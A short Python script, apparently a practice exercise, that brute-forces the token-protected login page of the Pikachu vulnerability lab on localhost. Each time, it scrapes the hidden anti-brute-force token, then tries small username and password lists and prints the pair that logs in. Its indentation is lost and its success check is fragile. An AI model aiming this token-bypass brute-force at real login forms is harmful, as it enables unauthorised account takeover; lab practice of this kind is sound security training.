提取token完成暴力破解pk靶场token防爆破页面
import requests
import re
import HackRequests
header={
'Host': 'localhost',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://localhost',
'Connection': 'close',
'Referer': 'http://localhost/pk/vul/burteforce/bf_token.php',
'Cookie': 'PHPSESSID=8b88vpd0fdkamclioioicgmf05',
'Upgrade-Insecure-Requests': '1',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-User': '?1',
'sec-ch-ua-platform': '"Windows"',
'sec-ch-ua': '"Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24"',
'sec-ch-ua-mobile': '?0',
}
def tokens():
data=requests.post('http://localhost/pk/vul/burteforce/bf_token.php',headers=header)
tokenz=re.compile('<input type="hidden" name="token" value="(.*?)" />',re.S)
token=re.findall(tokenz,data.text)
return token[0]
def pojie():
uname=['admin','index','aaaa']
pword=['123456','1515','465464']
for i in uname:
for a in pword:
parm="username="+i+"&password="+a+"&token="+tokens()+'&submit=Login'
print(parm)
hack=HackRequests.hackRequests()
data=hack.http('http://localhost/pk/vul/burteforce/bf_token.php',headers=header,post=parm,)
dataz=re.compile('<p> login succ(e)ss</p>',re.S)
stuta=re.findall(dataz,data.text())
if stuta[0]=='e':
print('用户名为{},密码为{}'.format(i,a))
pojie()